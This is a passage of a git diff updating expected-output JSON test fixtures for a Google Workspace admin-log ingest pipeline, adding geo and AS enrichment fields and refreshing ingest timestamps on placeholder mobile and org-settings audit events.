"1", @@ -1463,7 +1739,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977649400Z", + "ingested": "2021-12-14T14:44:42.510370325Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_WIRELESS_NETWORK_PASSWORD\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CHANGE_MOBILE_WIRELESS_NETWORK_PASSWORD", @@ -1518,6 +1794,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1527,7 +1815,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977654100Z", + "ingested": "2021-12-14T14:44:42.510370809Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"REMOVE_MOBILE_CERTIFICATE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_CERTIFICATE_COMMON_NAME\",\"value\":\"cert\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "REMOVE_MOBILE_CERTIFICATE", @@ -1577,6 +1865,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1586,7 +1886,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977657600Z", + "ingested": "2021-12-14T14:44:42.510371180Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ENROLL_FOR_GOOGLE_DEVICE_MANAGEMENT\"}}", "provider": "admin", "action": "ENROLL_FOR_GOOGLE_DEVICE_MANAGEMENT", @@ -1636,6 +1936,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1645,7 +1957,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977661800Z", + "ingested": "2021-12-14T14:44:42.510371555Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"USE_GOOGLE_MOBILE_MANAGEMENT\"}}", "provider": "admin", "action": "USE_GOOGLE_MOBILE_MANAGEMENT", @@ -1695,6 +2007,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1704,7 +2028,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977665700Z", + "ingested": "2021-12-14T14:44:42.510371928Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_NON_IOS\"}}", "provider": "admin", "action": "USE_GOOGLE_MOBILE_MANAGEMENT_FOR_NON_IOS", @@ -1754,6 +2078,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1763,7 +2099,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977670200Z", + "ingested": "2021-12-14T14:44:42.510372281Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_IOS\"}}", "provider": "admin", "action": "USE_GOOGLE_MOBILE_MANAGEMENT_FOR_IOS", @@ -1818,6 +2154,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1827,7 +2175,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977675400Z", + "ingested": "2021-12-14T14:44:42.510372645Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_ACCOUNT_WIPE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "MOBILE_ACCOUNT_WIPE", @@ -1883,6 +2231,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1892,7 +2252,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977680700Z", + "ingested": "2021-12-14T14:44:42.510373025Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_CANCEL_WIPE_THEN_APPROVE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "MOBILE_DEVICE_CANCEL_WIPE_THEN_APPROVE", @@ -1948,6 +2308,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1957,7 +2329,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977686Z", + "ingested": "2021-12-14T14:44:42.510373383Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_CANCEL_WIPE_THEN_BLOCK\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "MOBILE_DEVICE_CANCEL_WIPE_THEN_BLOCK", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-org.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-org.log-expected.json index f056c45c276..752554eb6af 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-org.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-org.log-expected.json @@ -34,6 +34,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -43,7 +55,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954861Z", + "ingested": "2021-12-14T14:44:47.354162155Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_LICENSES_ENABLED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"CHROME_LICENSES_ENABLED\",\"value\":\"DISABLED\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CHROME_LICENSES_ENABLED", @@ -98,6 +110,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -107,7 +131,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954864400Z", + "ingested": "2021-12-14T14:44:47.354164687Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_APPLICATION_LICENSE_RESERVATION_CREATED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"}]}}", "provider": "admin", "action": "CHROME_APPLICATION_LICENSE_RESERVATION_CREATED", @@ -162,6 +186,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -171,7 +207,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954869700Z", + "ingested": "2021-12-14T14:44:47.354165122Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_APPLICATION_LICENSE_RESERVATION_DELETED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"}]}}", "provider": "admin", "action": "CHROME_APPLICATION_LICENSE_RESERVATION_DELETED", @@ -226,6 +262,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -235,7 +283,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954875700Z", + "ingested": "2021-12-14T14:44:47.354165765Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_APPLICATION_LICENSE_RESERVATION_UPDATED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"}]}}", "provider": "admin", "action": "CHROME_APPLICATION_LICENSE_RESERVATION_UPDATED", @@ -290,6 +338,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -299,7 +359,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954881Z", + "ingested": "2021-12-14T14:44:47.354166093Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CREATE_DEVICE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"FULL_ORG_UNIT_PATH\",\"value\":\"full/org/path\"}]}}", "provider": "admin", "action": "CREATE_DEVICE_ENROLLMENT_TOKEN", @@ -354,6 +414,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -363,7 +435,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954884900Z", + "ingested": "2021-12-14T14:44:47.354166452Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"ASSIGN_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "ASSIGN_CUSTOM_LOGO", @@ -418,6 +490,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -427,7 +511,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954889100Z", + "ingested": "2021-12-14T14:44:47.354166782Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"UNASSIGN_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "UNASSIGN_CUSTOM_LOGO", @@ -482,6 +566,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -491,7 +587,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954894300Z", + "ingested": "2021-12-14T14:44:47.354167106Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CREATE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CREATE_ENROLLMENT_TOKEN", @@ -546,6 +642,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -555,7 +663,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954898500Z", + "ingested": "2021-12-14T14:44:47.354167429Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"REVOKE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "REVOKE_ENROLLMENT_TOKEN", @@ -610,6 +718,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -619,7 +739,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954902700Z", + "ingested": "2021-12-14T14:44:47.354167763Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_LICENSES_ALLOWED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"CHROME_LICENSES_ALLOWED\",\"value\":\"EMPTY\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CHROME_LICENSES_ALLOWED", @@ -674,6 +794,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -683,7 +815,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954906200Z", + "ingested": "2021-12-14T14:44:47.354168094Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CREATE_ORG_UNIT\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CREATE_ORG_UNIT", @@ -738,6 +870,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -747,7 +891,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954911Z", + "ingested": "2021-12-14T14:44:47.354168616Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"REMOVE_ORG_UNIT\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "REMOVE_ORG_UNIT", @@ -802,6 +946,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -811,7 +967,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954916300Z", + "ingested": "2021-12-14T14:44:47.354168949Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"EDIT_ORG_UNIT_DESCRIPTION\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "EDIT_ORG_UNIT_DESCRIPTION", @@ -864,6 +1020,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -873,7 +1041,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954921600Z", + "ingested": "2021-12-14T14:44:47.354169271Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"MOVE_ORG_UNIT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "MOVE_ORG_UNIT", @@ -926,6 +1094,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -935,7 +1115,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954926700Z", + "ingested": "2021-12-14T14:44:47.354169613Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"EDIT_ORG_UNIT_NAME\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "EDIT_ORG_UNIT_NAME", @@ -990,6 +1170,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -999,7 +1191,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954931900Z", + "ingested": "2021-12-14T14:44:47.354169943Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"REVOKE_DEVICE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"FULL_ORG_UNIT_PATH\",\"value\":\"full/org/path\"}]}}", "provider": "admin", "action": "REVOKE_DEVICE_ENROLLMENT_TOKEN", @@ -1054,6 +1246,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1063,7 +1267,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954937300Z", + "ingested": "2021-12-14T14:44:47.354170396Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"TOGGLE_SERVICE_ENABLED\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SERVICE_NAME\",\"value\":\"new\"}]}}", "provider": "admin", "action": "TOGGLE_SERVICE_ENABLED", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-security.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-security.log-expected.json index 